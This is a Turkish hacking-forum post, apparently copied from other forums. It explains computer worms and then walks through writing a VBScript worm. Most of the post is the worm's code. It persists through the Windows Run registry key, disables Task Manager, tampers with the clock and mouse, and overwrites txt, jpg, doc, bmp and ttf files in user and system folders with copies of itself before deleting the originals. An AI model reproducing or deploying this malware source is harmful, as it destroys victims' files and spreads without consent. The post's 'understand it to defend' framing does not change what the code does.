İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Worm Virüsü

22-11-2015 21:48
#1
Black Claw - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Mesajlar:
313
Teşekkür (Etti):
118
Teşekkür (Aldı):
19
Konular:
60
Ticaret:
(0) %
Worm (Solucan) Virüsü Nedir ?

Bilgisayar virüsü veya bilgisayar solucanı, makineye virüs bulaştığından haberiniz olmadan bilgisayarlarda veya bilgisayar ağları aracılığıyla kendi kendine çoğalabilen kötü amaçlı bir yazılım programıdır. Virüs veya bilgisayar solucanının birbirini izleyen her bir kopyası da kendi kendine çoğalabildiği için virüsler hızla yayılabilir. Bilgisayar virüslerinin ve bilgisayar solucanlarının farklı türleri vardır ve birçoğu yüksek düzeyde zarara neden olabilir.

Bilgisayar Virüsleri ve Solucanlar sizi nasıl etkiler?

Kötü amaçlı yazılım programlarının Virüsler ve Solucanlar adlı alt sınıfları şunları içerir:

Email-Worm
IM-Worm
IRC-Worm
Net-Worm
P2P-Worm
Virüs

Bilgisayar Solucanları

Bilinen çoğu bilgisayar solucanı, aşağıdaki yollardan birini kullanarak yayılır:

E-posta eki olarak gönderilen dosyalar
Web veya FTP kaynağı bağlantısı ile
ICQ veya IRC mesajında gönderilen bağlantılar ile
P2P (eşdüzeyler arası) dosya paylaşım ağları üzerinden
Bazı solucanlar, ağ paketleri olarak yayılır. Bunlar bilgisayar belleğine doğrudan girer ve ardından solucan kodu etkinleştirilir.

Bilgisayar solucanları, ağ yapılandırma hatalarından (örneğin, kendilerini tamamen erişilebilir bir diske kopyalamak için) veya işletim sistemi ve uygulama güvenliğindeki boşluklardan faydalanabilir. Birçok solucan, ağlar üzerinden kopyalarını yaymak için birden fazla yöntem kullanır.

Virüsler

Virüsler, bir bilgisayara sızmak için kullandıkları yönteme göre sınıflandırılabilir:

Dosya virüsleri
Önyükleme kesimi virüsleri
Makro virüsleri
Komut dosyası virüsleri

Bu kötü amaçlı yazılım alt sınıfındaki tüm programlar, ek Truva atı işlevleri de içerebilir.

Şimdi İse Worm Virüsünün Nasıl Yapıldığı.

Bir Virüsün Yapısını Virüs Yazarak İnceleyeceğiz
Belki Bu Birilerin Canını Fena Halde Yakabilir, Ama Bir Virüsü Anlamak İleride Başınıza Gelebilecek Muhtemel Olaylarda Çözümde Olabilir Ve İçindeki Bir Çok İpucu İşinizide Görebilir Virüsü Programlayacağımız Dil VBS(VISUAL BASIC SCRIPT)
Şimdi bir nevi worm (solucan) yazıcaz.Okuduktan sonra neden Worm denildiğini çok iyi anlarsınız umarım.
Wormu Yazarken NT sistemleri Hedef alıyoruz. Tam bir baş belası .txt, jpg, doc, ttf, bmp gibi uzantılarına sahip dosyalara kendini yazıyor. Size makaleyi okurken nereleri test edebileceğinize belirticem. Aksi takdirde bazı yerler sizinde başınızın belası olabilir...
Solucanımız 3 Aşamadan Meydana Gelecek;
1-Bulaşma
2-Fırtına Öncesi Sessizlik (Kuluçka)
3-Çoğalma ve Yok etme
1-Virüsler Bir Bilgisayara Bir Çok Yoldan Bulaşabilir Disketlerden, web sayfalarından, e-mailden, dosyadan vb... Worm Tipi Virüsler Genelde e-mail yoluyla bulaşır. Bullaşma Konusunu Sakıncalı olduğu için Bulaşma konusunu anlatmayacağım. Fakat Wormların Nasıl e-maillere ulaştıklarını merak edenler için sanırım aşağıdaki satır açıklayıcı olur;
Set Outlook = CreateObject("Outlook.Application")

2-Kuluçka Virüsün(Worm un) aktifleşmeyi beklediği zaman sürecidir. Bu virüsün yapısına göre değişebilir.

3-Çoğalma ve Yok etme Worm un aktif olduğu zaman ne halt karıştıracağıdır bu da virüsün yapısına göre değişir.

İŞTE SİZE YETECEK KODLAR

Dim RegVeYol,Yol,Sys,Ben,str,App
Set RegVeYol = CreateObject( "Wscript.Shell" )
set Shell = WScript.CreateObject( "WScript.Shell" )

Virus Dosya İşlemleri Ve Bir Çok İşlem İçin Scripting.FileSystemObject ve WScript.Shell Nesnesini Kullanıyor

Set Yapici =CreateObject( "Scripting.FileSystemObject" )
Set Ben = Yapici.GetFile( WScript.ScriptFullName)

Sadece CdRom Kapağını Açmak İçin WMPlayer.OCX.7 kulanıyor

Set CdRom = CreateObject( "WMPlayer.OCX.7" )

WScript.Network Nesnesi Belki Birçok Olay İçin Kullanıla Bilir ama Virüs Sadece Kullanıcı Adını Bulmak İçin Kullanıyor

Set KurbanPc = WScript.CreateObject( "WScript.Network" )
KurbanName= KurbanPc.UserName

Virüs İlk Çalıştığında Registry Da Olup Olmadığını Kontrol Ediyor

on error resume next
str= RegVeYol.RegRead ("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCur ren tVersionRun")

Üsteki Satırda Registry Den Okuyor

Aşağıdaki kontrol bloğu ise kendisi Registry ye yazılmış ise Virüs aktif hale geçiyor aksi durumda
Ki genelde ilk çalışdığında öyle olacak
Kendini Windows her başladığında çalışmak üzere Registry yazar ve kendisini WindowsSystem32 dizinine Windows.VBS adında kopyalar

if str<>Yapici.GetSpecialFolder(1)&"Windows.vbs"Then
Ben.Copy (Yapici.GetSpecialFolder(1)&"Windows.vbs")
RegVeYol.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCur rent VersionRun",Yapici.GetSpecialFolder(1)&"Windows.vb s"
end if

Artık Worm Windows Tekrar ilk başladığında Aktif hale gelecek

Worm aktifleştiğinde yapacağı ilk iş Saat i ve Tarihi bozmaktır
Windows Saat ve Tarih Ayarlarını açar ve SendKeys metodunu kullanarak saat ve tarihi değiştirir.
Saat i :00:00 ve tarihide 01 çalıştığı gün 2099 ayarlar
Böylece sistem saatine bağlı çalışan uygulamada çalınmaz duruma gelecektir.

aşağıdaki satırlar bu işi yapar

shell.Run "RUNDLL32 SHELL32.DLL,Control_RunDLL TIMEDATE.CPL,@0,",0
shell.AppActivate "TIMEDATE"
WScript.Sleep 100
Shell.SendKeys "{PGUP}"&"{TAB}"&"{BS}"&"{TAB}"&"{TAB}"&"0"&"{ TAB} "&"0"&"{TAB}"&"0"&"{TAB}"&"~"

Registry ile görev yöneticisi pasif yapıyor.
RegVeYol.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurr entV ersionPoliciesSystemDisableTaskMgr", "1"

User32den SwapMouseButton fonksiyonunu çağırıyor ve Mouseun Sağ Buttonu İle Sol Buttonu değiştiriyor
Shell.Run ("RUNDLL32 USER32.DLL,SwapMouseButton")

Aşağıdaki Satır İse Windows dizindeki bir Wav dosyasını çalıştırır ben bulaştım sana diyor
Komutun sonundaki 0 parametresi ise Media Player ı gizler
Shell.Run "ALSNDMGR.wav",0

Virüs ben bulaştım sana demeye devam ediyor ve yine SendKeys metodunu kullanarak
klavye ışıkları ile oynuyor Kara şimşek Yapıyor.
Sleep Ler Bir Komutdan Diğerine Bekleme Süresini Veriyor


for a=0 to 100
WScript.Sleep 40
Shell.SendKeys "{NUMLOCK}"
WScript.Sleep 100
Shell.SendKeys "{CAPSLOCK}"
WScript.Sleep 100
Shell.SendKeys "{SCROLLLOCK}"
next

Buda yetmiyor not defterini acıp mesajlalar veriyor

Shell.Run "notepad"
WScript.Sleep 40
shell.AppActivate "NOTEPAD"
WScript.sleep 250
for a=0 to 100
WScript.Sleep 100
Shell.SendKeys KurbanName & " Beni Anlamak İstiyor Musun?

~ Karakteri Enter tuşu görevi yapıyor

Shell.SendKeys "~"
Shell.SendKeys "Ölüler Konuşuyor Duymuyor Musun?"
Shell.SendKeys "~"&"~"
next

Bir web adresini aç ıyor

shell.Run ("rundll32.exe url.dll,FileProtocolHandler http://www.PcChoLik.WormMaker")


Cdrom Kapaklarını Acıyor

on error resume next
CdRom.cdromCollection.Item(0).eject
CdRom.cdromCollection.Item(1).eject

** İyi bir Windows Bilgisine Sahip İseniz Buraya Kadar Yazılanları Bilgisayarınızda Test Edebilirsiniz Ve Worm un Bilgisayarınızda Yaptığı Değişiklilikleri Düzeltiniz .
Bura dan Sonra Yazılanları Test Etmeniz Önerilmez! Bundan yazarı sorumlu tutamazsınız ;-)

Aşağıdaki Satırlar Bir Wormu Solucan Yapan Satırların Ta kendisi
Yani Çoğalma Ve Yok Etme Kullanıcı Worm un Yaptığı İşler İle Uğrasa dursun
Bakın Worm Neler Yapıyor.

Önce Dizin Adındaki 7 indisli dizi değişkenine 7 Adet Klasör Atıyor
Dizi yi For döngüsüne bağlayıp dizinlerdeki belirtilen dosya uzantılarındaki dosyaları buluyor
Önce Bulduğu Dosyanın İçeriğin e Kendini Yazıyor
Ve dosya_adı.uzantısı.vbs olarak bir kopyasını oluşturduktan sonra
eski dosyayı siliyor.

Dim Dosya,, DosyalariBul, Dosyalar, Bul,Dizin(7)
Dizin(0)=Yapici.GetSpecialFolder(0)
Dizin(1)=Yapici.GetSpecialFolder(1)
Dizin(2)=Yapici.GetSpecialFolder(2)
Dizin(3)=RegVeYol.SpecialFolders("My********s")
Dizin(4)=RegVeYol.SpecialFolders("Desktop")
Dizin(5)=RegVeYol.SpecialFolders("Fonts")
Dizin(6)=RegVeYol.SpecialFolders("Favorites")
Dizin(7)=RegVeYol.RegRead("HKEY_CURRENT_USERSoftwa reMicrosoftInternet ExplorerDownload Directory")
for i=0 to 7

Kendisini Acıyor
Set Dosya = Yapici.OpenTextFile(WScript.ScriptFullName,1)

for Dönsünde Her bir dönüşte Bir Sonraki Dizine Geçiyor

Set DosyalariBul = Yapici.GetFolder(Dizin(i))

Dizin İçindeki Dosyaları Alıyor
Set Dosyalar = DosyalariBul.Files

Yaz Değişkenine Kendi İçeriğini Veriyor.
Yaz = Dosya.ReadAll

Bulunan Dosya Sayısı Kadar Döngüye Giriyor
Ve Dosyalar Bulunuyor.

For each file1 in Dosyalar
uzantilar = Yapici.GetExtensionName(file1.path)
uzantilar = lcase(uzanti)

Belirtilen Türde Dosya Buldu ise İçeriğine Kendini Yazıyor Siz Burda Dosya Türünü Değiştirip Deneye Bilirsiniz.

If (uzantilar = "txt") or (uzantilar = "jpg")or(uzantilar = "bmp")or (uzantilar = "ttf")or (uzantilar = "doc") Then
Set Bul = Yapici.OpenTextFile(file1.path, 2, True)
Bul.Write Yaz
Bul.Close

Sonra İçene Yazdığı Dosyayı Dosya_adı.Uzantısı.vbs Olarak Kopyalıyor ve Eski Dosyayı Siliyor

set Kopya=Yapici.GetFile(file1.path)
Kopya.copy(file1.path&".vbs")
Yapici.DeleteFile(file1.path)
End If
next
next

KONU FARKLI FORMLARDAN ALINTIDIR DOSTLAR.
YARDIMCI OLABİLDİYSEM VE BİLGİ KAZANDIYSANIZ NE MUTLU BANA.
EĞERKİ FORUMDA PAYLAŞAN VAR İSE GÖRMEDİM KUSURUMA BAKMAYIN.
Bİ TEŞEKKÜRÜ HAK ETTİYSEM TEŞEKKÜRLER
Kullanıcı İmzası
"Bir gece ansızın gelir krallığınızı imparatorluğuma katarım."

"Fatih Sultan Mehmet"
Konu Black Claw tarafından (22-11-2015 22:31 Saat 22:31 ) değiştirilmiştir.

23-11-2015 21:14
#2
Black Claw - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Mesajlar:
313
Teşekkür (Etti):
118
Teşekkür (Aldı):
19
Konular:
60
Ticaret:
(0) %
/Güncel
Kullanıcı İmzası
"Bir gece ansızın gelir krallığınızı imparatorluğuma katarım."

"Fatih Sultan Mehmet"

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı